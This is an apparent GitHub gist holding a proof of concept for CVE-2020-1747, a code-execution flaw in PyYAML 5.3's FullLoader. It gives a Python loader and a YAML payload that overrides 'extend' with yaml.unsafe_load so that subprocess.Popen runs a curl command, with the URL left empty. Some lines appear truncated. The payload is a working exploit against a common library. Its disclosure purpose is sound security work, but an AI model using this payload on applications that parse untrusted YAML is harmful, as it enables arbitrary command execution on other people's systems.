Skip to content

Instantly share code, notes, and snippets.

Last active Dec 3, 2020
What would you like to do?
CVE-2020-1747 PyYAML PoC
# pyyaml==5.3 required. Vulnerability has been fixed in 5.3.1
# More: ret2libc's report in
# Explanation:
from yaml import *
with open('payload.yaml','rb') as f:
content =
data = load(content, Loader=FullLoader) # Using vulnerable FullLoader
# The `extend` function is overriden to run `yaml.unsafe_load` with
# custom `listitems` argument, in this case a simple curl request
- !!python/object/new:yaml.MappingNode
listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", ""]]'
tag: !!str dummy
value: !!str dummy
extend: !!python/name:yaml.unsafe_load
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment